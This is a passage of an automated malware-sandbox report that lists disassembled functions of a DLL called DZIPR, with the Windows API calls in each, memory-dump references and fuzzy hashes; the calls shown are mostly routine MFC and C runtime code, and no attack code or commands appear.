                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FD17C81
                          • UnhandledExceptionFilter.KERNEL32(6FD2A4B8), ref: 6FD17C8C
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FD17CA8
                          • TerminateProcess.KERNEL32(00000000), ref: 6FD17CAF
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 413c34e62b3f8b3672493a24e99329ef6dcdd2df9a20376c38966606eb9e4603
                          • Instruction ID: a7d23db29946f90f24fabcbd7d1b13badbd263efb08079cb9911891f31c4d308
                          • Opcode Fuzzy Hash: 413c34e62b3f8b3672493a24e99329ef6dcdd2df9a20376c38966606eb9e4603
                          • Instruction Fuzzy Hash: D021E47A806A06EFFFA0CF18D9457493BB4BB0B324B58411AE60887390DBB174A08B51
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6FD089FC
                          • __snwprintf_s.LIBCMT ref: 6FD08A2E
                          • LoadLibraryW.KERNEL32(?), ref: 6FD08A69
                            • Part of subcall function 6FD15348: __getptd_noexit.LIBCMT ref: 6FD15348
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                          • String ID: LOC
                          • API String ID: 3175857669-519433814
                          • Opcode ID: e7753186db12d0ac06b0255ba840d9909f7f775dfc57a1f01c1a47b09e99e732
                          • Instruction ID: 23d136ea46081034d74d016d4dd725874f2eb703dbb7eb112745ffee6197f428
                          • Opcode Fuzzy Hash: e7753186db12d0ac06b0255ba840d9909f7f775dfc57a1f01c1a47b09e99e732
                          • Instruction Fuzzy Hash: 8611B471A59308ABDB91FF78DC45BAE77ACAF02358F400575A210A70C1DB78BA04D7B1
                          APIs
                            • Part of subcall function 6FD12C57: GetWindowLongW.USER32(?,000000F0), ref: 6FD12C62
                          • GetKeyState.USER32(00000010), ref: 6FD10514
                          • GetKeyState.USER32(00000011), ref: 6FD1051D
                          • GetKeyState.USER32(00000012), ref: 6FD10526
                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6FD1053C
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: State$LongMessageSendWindow
                          • String ID:
                          • API String ID: 1063413437-0
                          • Opcode ID: 85940423050d37c72425c347b6c5d1144121f0cddde17c1102d91f8a0865aaae
                          • Instruction ID: fb3eeba1bd53a325889c3c8a1f961c10ab317f42bfa2421573b45dc07a5fb38d
                          • Opcode Fuzzy Hash: 85940423050d37c72425c347b6c5d1144121f0cddde17c1102d91f8a0865aaae
                          • Instruction Fuzzy Hash: E4F0E93674838FA7FA96B7746C49FFD09256F81BD4F0414326745EA0C1DEA0F4224570
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 6FD0E61F
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 6FD0E634
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$CallNtdllProcProc_
                          • String ID:
                          • API String ID: 1646280189-0
                          • Opcode ID: 7f23d1b5d6efb71567e6fbb48213a3655d9c9435aba90963c1d45708beadb2a8
                          • Instruction ID: 0a51d18876fea74a4ab1d2198c7f25f21ab7a0b5a5b6f03bbb788b68bb3586b2
                          • Opcode Fuzzy Hash: 7f23d1b5d6efb71567e6fbb48213a3655d9c9435aba90963c1d45708beadb2a8
                          • Instruction Fuzzy Hash: 92F01C36104605FFDF11AFA4DC04D9A7BB9FF49761B088829FA99C6520D732F820EB80
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f971f8ef528cf85e3fc682910a570427b3fa18ffea986e9eee9225d290567fa7
                          • Instruction ID: 52c159776135a2632ae57c3b0b0925e0ae1f90907c5b0accf459df31c3090c84
                          • Opcode Fuzzy Hash: f971f8ef528cf85e3fc682910a570427b3fa18ffea986e9eee9225d290567fa7
                          • Instruction Fuzzy Hash: 3FF0823204922CFB8F42BF95AD08DCB3B2AEF093A1B009011FA5456450C731F530DBA1
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FD08BE9
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FD08EB7,?,?), ref: 6FD08C19
                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FD08C2D
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C69
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FD08C77
                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FD08C94
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FD08CBF
                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FD08CC8
                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6FD08CE1
                          • EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6FD08CFE
                          • ConvertDefaultLocale.KERNEL32(?), ref: 6FD08D31
                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 6FD08D3A
                          • GetModuleFileNameW.KERNEL32(6FD00000,?,00000105), ref: 6FD08D7F
                          • _memset.LIBCMT ref: 6FD08D9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                          • API String ID: 3537336938-2299501126
                          • Opcode ID: f0f6bd3db139789d38ff364b7cb99a0fc85264c2f17fd9a1c29dbad2e4b18d9f
                          • Instruction ID: 51fa8f508208606da06895d71bafca1d0d3fccd788e204ff1f5f779daf3b86c6
                          • Opcode Fuzzy Hash: f0f6bd3db139789d38ff364b7cb99a0fc85264c2f17fd9a1c29dbad2e4b18d9f
                          • Instruction Fuzzy Hash: 7D513E71D152289FDBA0EFA5DC887ADB6B4EF58314F1001E6A448E3280D774AE85CF64
                          APIs
                          • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,76944A40,6FD0DE36,?,?,?,?,?,?,?,6FD0FCC6,00000000,00000002,00000028), ref: 6FD0DCF9
                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FD0DD15
                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FD0DD2A
                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FD0DD3B
                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FD0DD4C
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FD0DD5D
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FD0DD6E
                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FD0DD8E
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                          • API String ID: 667068680-2451437823
                          • Opcode ID: a0abb23eeb2024dfbecdeceb638e9fa0a4d34f9eaecd27d3b9bde017473bc932
                          • Instruction ID: 0e56adce6a3607533145a3b9eb49b7754391286abdf9999027634b6cec439968
                          • Opcode Fuzzy Hash: a0abb23eeb2024dfbecdeceb638e9fa0a4d34f9eaecd27d3b9bde017473bc932
                          • Instruction Fuzzy Hash: AA214F73915B61AFABE07F7888C44AA7BE5B68B22531C463FD305D3108CB7A3056DE61
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FD119B8
                            • Part of subcall function 6FD0C050: __EH_prolog3.LIBCMT ref: 6FD0C057
                          • CallNextHookEx.USER32(?,?,?,?), ref: 6FD119F8
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          • _memset.LIBCMT ref: 6FD11A51
                          • GetClassLongW.USER32(?,000000E0), ref: 6FD11A85
                          • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FD11ADA
                          • GetClassNameW.USER32(?,?,00000100), ref: 6FD11B20
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FD11B46
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11B5D
                          • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FD11B6F
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11B77
                          • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FD11B86
                          • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FD11B94
                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FD11BA6
                          • UnhookWindowsHookEx.USER32(?), ref: 6FD11BBA
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                          • String ID: #32768$AfxOldWndProc423
                          • API String ID: 4265692241-2141921550
                          • Opcode ID: 82f6d303f367d9be8373bda24b74c0309ac224cab7d68ecfef1e1bf5c7d3fefa
                          • Instruction ID: 145aa94bf167aec944015ae01ab62fc1d4f7831fe926ae32fa004d865496f36a
                          • Opcode Fuzzy Hash: 82f6d303f367d9be8373bda24b74c0309ac224cab7d68ecfef1e1bf5c7d3fefa
                          • Instruction Fuzzy Hash: 0C51027154872AEBEF61EF24DD48B9A7BBCBF16361F040185F509961C0DB30BA91CBA0
                          APIs
                            • Part of subcall function 6FD12C57: GetWindowLongW.USER32(?,000000F0), ref: 6FD12C62
                          • GetParent.USER32(?), ref: 6FD0FC05
                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FD0FC28
                          • GetWindowRect.USER32(?,?), ref: 6FD0FC42
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FD0FC58
                          • CopyRect.USER32(?,?), ref: 6FD0FCA5
                          • CopyRect.USER32(?,?), ref: 6FD0FCAF
                          • GetWindowRect.USER32(00000000,?), ref: 6FD0FCB8
                            • Part of subcall function 6FD0DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FD0DED6
                          • CopyRect.USER32(?,?), ref: 6FD0FCD4
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                          • String ID: (
                          • API String ID: 1385303425-3887548279
                          • Opcode ID: b25ed687cd2142af083caad45fc10c7cd8d9f6b0175f43ea353b17e1034d2cf5
                          • Instruction ID: 6f6efdbd48a619f4223d4cf9bc4a6c7a792e73b851ce28a109a3a5bfac833279
                          • Opcode Fuzzy Hash: b25ed687cd2142af083caad45fc10c7cd8d9f6b0175f43ea353b17e1034d2cf5
                          • Instruction Fuzzy Hash: 70516272904619ABDB40EFA8CD85AEEBBB9FF48314F194116E915F7184DB30F901CBA4
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FD2E928,0000000C,6FD1A25A,00000000,00000000,?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C), ref: 6FD1A131
                          • __crt_waiting_on_module_handle.LIBCMT ref: 6FD1A13C
                            • Part of subcall function 6FD15BCF: Sleep.KERNEL32(000003E8,00000000,?,6FD1A082,KERNEL32.DLL,?,?,6FD1A416,00000000,?,6FD1488C,00000000,?,?,?,6FD148EF), ref: 6FD15BDB
                            • Part of subcall function 6FD15BCF: GetModuleHandleW.KERNEL32(00000000,?,6FD1A082,KERNEL32.DLL,?,?,6FD1A416,00000000,?,6FD1488C,00000000,?,?,?,6FD148EF,?), ref: 6FD15BE4
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FD1A165
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FD1A175
                          • __lock.LIBCMT ref: 6FD1A197
                          • InterlockedIncrement.KERNEL32(?), ref: 6FD1A1A4
                          • __lock.LIBCMT ref: 6FD1A1B8
                          • ___addlocaleref.LIBCMT ref: 6FD1A1D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-2843748187
                          • Opcode ID: a4a2e7593a99fc56b638b2a20eb53091acc885a4e959f5fc4ad9792c011e7ec5
                          • Instruction ID: b4faa65a72a7548698dbf44b099910b549072e45152b45a16fdbb75f5fd8f695
                          • Opcode Fuzzy Hash: a4a2e7593a99fc56b638b2a20eb53091acc885a4e959f5fc4ad9792c011e7ec5
                          • Instruction Fuzzy Hash: B711A572808B01DFE7A1DF79D804B5ABBE4AF45328F108519D5A9972D0CB34B585CFA4
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FD08503
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD08520
                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FD0852D
                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FD0853A
                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FD08547
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 667068680-2424895508
                          • Opcode ID: c76eee13037fb6ca02be32fdaaee9c186c0bd7221ce8129da4f3e29b34c23b07
                          • Instruction ID: 59c4c6793e9a4aa682f0c5467dd5ca7de6fcc7f1dc08300f8a92182571859829
                          • Opcode Fuzzy Hash: c76eee13037fb6ca02be32fdaaee9c186c0bd7221ce8129da4f3e29b34c23b07
                          • Instruction Fuzzy Hash: 1F1146B680D792EFAFB1AF55898E40ABFA4AA47325308443FE30597140DA307464CE51
                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32,6FD0A6B6), ref: 6FD0A5AA
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FD0A5CB
                          • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FD0A5DD
                          • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FD0A5EF
                          • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FD0A601
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                          • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 417325364-2424895508
                          • Opcode ID: d480feacb68732ceb47d712e485d8a3500fbae4ab41a2c8b075c732848ed9cf4
                          • Instruction ID: c68565b9a2ebaadd85770eb0bbb9bd019250ebd06d1dc84702ea0d6c01bb448e
                          • Opcode Fuzzy Hash: d480feacb68732ceb47d712e485d8a3500fbae4ab41a2c8b075c732848ed9cf4
                          • Instruction Fuzzy Hash: 90F0A97AC0DB35BFEFE15F759D055057EA8A7073797088417AB0092100DBB4B068CF91
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6FD11868
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FD11877
                          • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FD118D1
                            • Part of subcall function 6FD10C2C: GetWindowRect.USER32(?,10000000), ref: 6FD10C56
                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FD118F8
                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FD11900
                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FD11907
                          • GlobalDeleteAtom.KERNEL32(?), ref: 6FD11911
                          • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FD11965
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                          • String ID: AfxOldWndProc423
                          • API String ID: 2109165785-1060338832
                          • Opcode ID: fbd05d2a5be1a9a69d5bb1d13674b4793385e8b11957af1535d42d1b0792a73a
                          • Instruction ID: d39830a2174c5cafcdbdf0f1cd3d0a90f525e5b969fa147dfbeb8e087be3474d
                          • Opcode Fuzzy Hash: fbd05d2a5be1a9a69d5bb1d13674b4793385e8b11957af1535d42d1b0792a73a
                          • Instruction Fuzzy Hash: 59314F3240921AABDF41EFE4ED48DBF7A7CAF16315F044116F611A6190CB35A921EBB1
                          APIs
                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01C39
                          • GetLastError.KERNEL32(?,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01C48
                          • __aullrem.LIBCMT ref: 6FD01C60
                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FD01CE8
                          • _memset.LIBCMT ref: 6FD01CF5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FD01BE9,?,?,?,?), ref: 6FD01D07
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                          • String ID:
                          • API String ID: 123228641-0
                          • Opcode ID: c0738c0aa17538f0201b316309ab81dd506d552fa6daaab1cd2dc690836e1284
                          • Instruction ID: 7950df866e31292fc7998d231bcd09e5e312de5d11681d812bd53876c75e4c41
                          • Opcode Fuzzy Hash: c0738c0aa17538f0201b316309ab81dd506d552fa6daaab1cd2dc690836e1284
                          • Instruction Fuzzy Hash: 08512F71A08711AFD780DF29D844B9BB7E8FF88758F14492AF958D7240E770F9048BA2
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6FD0BE14
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6FD0BE25
                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?,?,?,?), ref: 6FD0BE43
                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BE77
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEE3
                          • _memset.LIBCMT ref: 6FD0BF02
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BF13
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BF34
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                          • String ID:
                          • API String ID: 1891723912-0
                          • Opcode ID: 655a7997727964df74d340265ec914760693632e8a8a4f067e3fdf90d13ea65e
                          • Instruction ID: 9998bb576608cfcf5e6c79a88300bbe076afde959be3b20c53a6affd66c2ec3d
                          • Opcode Fuzzy Hash: 655a7997727964df74d340265ec914760693632e8a8a4f067e3fdf90d13ea65e
                          • Instruction Fuzzy Hash: 43318C75408605EFEB51EF64C88486ABBB1EF01324B10C62AE6559B6D0CB32B950CFA0
                          APIs
                            • Part of subcall function 6FD0815A: GetParent.USER32(?), ref: 6FD081AE
